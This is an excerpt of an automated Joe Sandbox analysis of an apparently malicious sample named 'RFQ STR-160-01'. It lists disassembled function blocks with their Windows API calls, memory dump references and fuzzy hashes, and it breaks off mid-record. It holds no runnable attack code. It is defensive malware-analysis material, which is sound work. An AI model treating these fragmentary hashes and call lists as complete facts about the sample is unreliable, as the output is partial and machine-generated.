              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessagePostSleep$RectWindow
              • String ID:
              • API String ID: 3382505437-0
              • Opcode ID: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
              • Instruction ID: f01d71876cc23228f2eadc300d16a872238b09ce2b05b6eef089629b0965772c
              • Opcode Fuzzy Hash: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
              • Instruction Fuzzy Hash: E231D37190061DEFCB14CFA8CE59AEE3BB6FB44324F004229FA21A72D0C7B49954DB90
              APIs
              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00625745
              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0062579D
              • _wcslen.LIBCMT ref: 006257AF
              • _wcslen.LIBCMT ref: 006257BA
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$_wcslen
              • String ID:
              • API String ID: 763830540-0
              • Opcode ID: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
              • Instruction ID: 4989a3767625ba71620d45139e7548172db13ac85af81a9eb7ed877d79b3a52f
              • Opcode Fuzzy Hash: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
              • Instruction Fuzzy Hash: 97219971904A28DADB309F64EC45AEDBBBAFF44724F108216F92ADB280D770D985CF50
              APIs
              • IsWindow.USER32(00000000), ref: 00610951
              • GetForegroundWindow.USER32 ref: 00610968
              • GetDC.USER32(00000000), ref: 006109A4
              • GetPixel.GDI32(00000000,?,00000003), ref: 006109B0
              • ReleaseDC.USER32(00000000,00000003), ref: 006109E8
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ForegroundPixelRelease
              • String ID:
              • API String ID: 4156661090-0
              • Opcode ID: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
              • Instruction ID: 03799fc358fbe5d8bf159086ac3a979e5b6199c674ace72a8a965648a0267877
              • Opcode Fuzzy Hash: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
              • Instruction Fuzzy Hash: B121A135600204AFEB14EF64D888AAFBBF6FF44710F04846CE84A97762DB70AC45CB90
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 005CCDC6
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CCDE9
                • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005CCE0F
              • _free.LIBCMT ref: 005CCE22
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CCE31
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
              • Instruction ID: 1dd9259f8ef0af844a8cbabd94c42c3f44f3226001d664a43093589a67b4368c
              • Opcode Fuzzy Hash: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
              • Instruction Fuzzy Hash: 46018472602A157F632256F66C8DE7F6D6DFEC7BA1315012DFD0AC7201EA618D0281F0
              APIs
              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
              • SelectObject.GDI32(?,00000000), ref: 005A96A2
              • BeginPath.GDI32(?), ref: 005A96B9
              • SelectObject.GDI32(?,00000000), ref: 005A96E2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
              • Instruction ID: 4fa1b58a276c55c676245f32627023ed1bafc28d2095c122b5e8c52c7dcefc55
              • Opcode Fuzzy Hash: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
              • Instruction Fuzzy Hash: AF216D30802219EBEB119F65DC197AD3FAABF42325F181316F410AB1A0D3B05891CFD4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
              • Instruction ID: 8c3e4d3d07322c1fd2ba9fa75129a9d8db1765505c310c108703dfa236c7a0dc
              • Opcode Fuzzy Hash: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
              • Instruction Fuzzy Hash: BF01D661286E1DBB924862119D42EFB7B9DFB603D4B404430FF069A241F624FD1086A4
              APIs
              • GetLastError.KERNEL32(?,?,?,005BF2DE,005C3863,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6), ref: 005C2DFD
              • _free.LIBCMT ref: 005C2E32
              • _free.LIBCMT ref: 005C2E59
              • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E66
              • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E6F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
              • Instruction ID: 0c79eaa9748313d3b83a0dada578af86f7a1994ab60028ae2cda666c43d1f995
              • Opcode Fuzzy Hash: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
              • Instruction Fuzzy Hash: D801F436205A056FDB22A7F56C49F3F2E6EBBD13B5F21882CF425B2192EA308C018020
              APIs
              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0070
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: From$Prog$FreeStringTasklstrcmpi
              • String ID:
              • API String ID: 3897988419-0
              • Opcode ID: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
              • Instruction ID: 525f7044c93b478889f2979391e74a27ac908ed2eb3482908e686ae221040337
              • Opcode Fuzzy Hash: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
              • Instruction Fuzzy Hash: DA01BC72600608BBDB204F69DC08BBE7EAEEB44361F18A424FA01D2251DB78DD409BA0
              APIs
              • QueryPerformanceCounter.KERNEL32(?), ref: 005FE997
              • QueryPerformanceFrequency.KERNEL32(?), ref: 005FE9A5
              • Sleep.KERNEL32(00000000), ref: 005FE9AD
              • QueryPerformanceCounter.KERNEL32(?), ref: 005FE9B7
              • Sleep.KERNEL32 ref: 005FE9F3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
              • Instruction ID: b4de012c36858a3a70b4c460db367c077f35f81073d08375de4f66138de9a350
              • Opcode Fuzzy Hash: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
              • Instruction Fuzzy Hash: 42015B31C01A2DDBCF109FE4DD4E6EDBB79BB09711F000546E602B2261CB749655C7A1
              APIs
              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
              • GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
              • String ID:
              • API String ID: 842720411-0
              • Opcode ID: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
              • Instruction ID: c6c2f77d6faa3971fbac6ccf78691fd8ba091febc60a7277a4274c9ebf6e2c3f
              • Opcode Fuzzy Hash: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
              • Instruction Fuzzy Hash: 5A01F679600A09AFDB214BA5DC49E6A3F6EEF893A0B204419FA45D7260DB31DC11DAA0
              APIs
              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
              • Instruction ID: eb2246d9ada81b7af75a8ba0d30f2c654f9544302e1170c7ccda978ae4f43ce9
              • Opcode Fuzzy Hash: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
              • Instruction Fuzzy Hash: 5EF04F36100B05EBD7214FA4DC4EF5A3F6EFF89761F104414FA45C7251DA75DC518A60
              APIs
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
              • Instruction ID: 6d71fb72c48835c06ebd8324713c3574640ae33dfad2707022e6044a21bdaf75
              • Opcode Fuzzy Hash: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
              • Instruction Fuzzy Hash: 5DF04935200B05EBDB215FA5EC4DF6A3FAEFF89761F200424FA45CB250CA75D8918A60
              APIs
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600324
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600331
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060033E
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060034B
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600358
              • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600365
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
              • Instruction ID: 499289aaac5cdc63e053bbd767c515b0f01e440051d144e914816ecf8ea13a16
              • Opcode Fuzzy Hash: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
              • Instruction Fuzzy Hash: 0601E272800B029FD7399F66D880543F7F6BF503153148A3FD19252A70C371A944CF80
              APIs
              • _free.LIBCMT ref: 005CD752
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005CD764
              • _free.LIBCMT ref: 005CD776
              • _free.LIBCMT ref: 005CD788
              • _free.LIBCMT ref: 005CD79A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
              • Instruction ID: 45b9e0e7fedf2cf525635835545538ac84094f4198b3444abfe921b0f4e5c684
              • Opcode Fuzzy Hash: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
              • Instruction Fuzzy Hash: 22F0C972544305AFC621EBA4F9C9E167FEAFB44721F95181DF049E7501C634F8808674
              APIs
              • GetDlgItem.USER32(?,000003E9), ref: 005F5C58
              • GetWindowTextW.USER32(00000000,?,00000100), ref: 005F5C6F
              • MessageBeep.USER32(00000000), ref: 005F5C87
              • KillTimer.USER32(?,0000040A), ref: 005F5CA3
              • EndDialog.USER32(?,00000001), ref: 005F5CBD
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: BeepDialogItemKillMessageTextTimerWindow
              • String ID:
              • API String ID: 3741023627-0
              • Opcode ID: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
              • Instruction ID: 1b0e1ec9d190b1762bb2d1a5f9d068d7ea4461bf9fa1c5691b688344c3b50830
              • Opcode Fuzzy Hash: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
              • Instruction Fuzzy Hash: D2018630500F08ABEB305B14DD5EFBA7BB9BF00B05F001559A783A14E1EBF4AD898A90
              APIs
              • _free.LIBCMT ref: 005C22BE
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005C22D0
              • _free.LIBCMT ref: 005C22E3
              • _free.LIBCMT ref: 005C22F4
              • _free.LIBCMT ref: 005C2305
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
              • Instruction ID: 14517d736cc2e909d1418c15d770a6948e3708f9ebf4a42d03c039767eb5cecc
              • Opcode Fuzzy Hash: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
              • Instruction Fuzzy Hash: FFF03A748402629FDB12AFA4BC05E093F6BB759761F04251EF818D72B1CBB00A91EFA4
              APIs
              • EndPath.GDI32(?), ref: 005A95D4
              • StrokeAndFillPath.GDI32(?,?,005E71F7,00000000,?,?,?), ref: 005A95F0
              • SelectObject.GDI32(?,00000000), ref: 005A9603
              • DeleteObject.GDI32 ref: 005A9616
              • StrokePath.GDI32(?), ref: 005A9631
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Path$ObjectStroke$DeleteFillSelect
              • String ID:
              • API String ID: 2625713937-0
              • Opcode ID: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
              • Instruction ID: 18685382fce011b7a2d7f91344880c162182a9aa6ca5075b735e140d1df194c8
              • Opcode Fuzzy Hash: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
              • Instruction Fuzzy Hash: 28F0C931405608EBEB265F66ED1D7683F66BB07332F08A314F4655A0F0C7B189A6DFA4
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
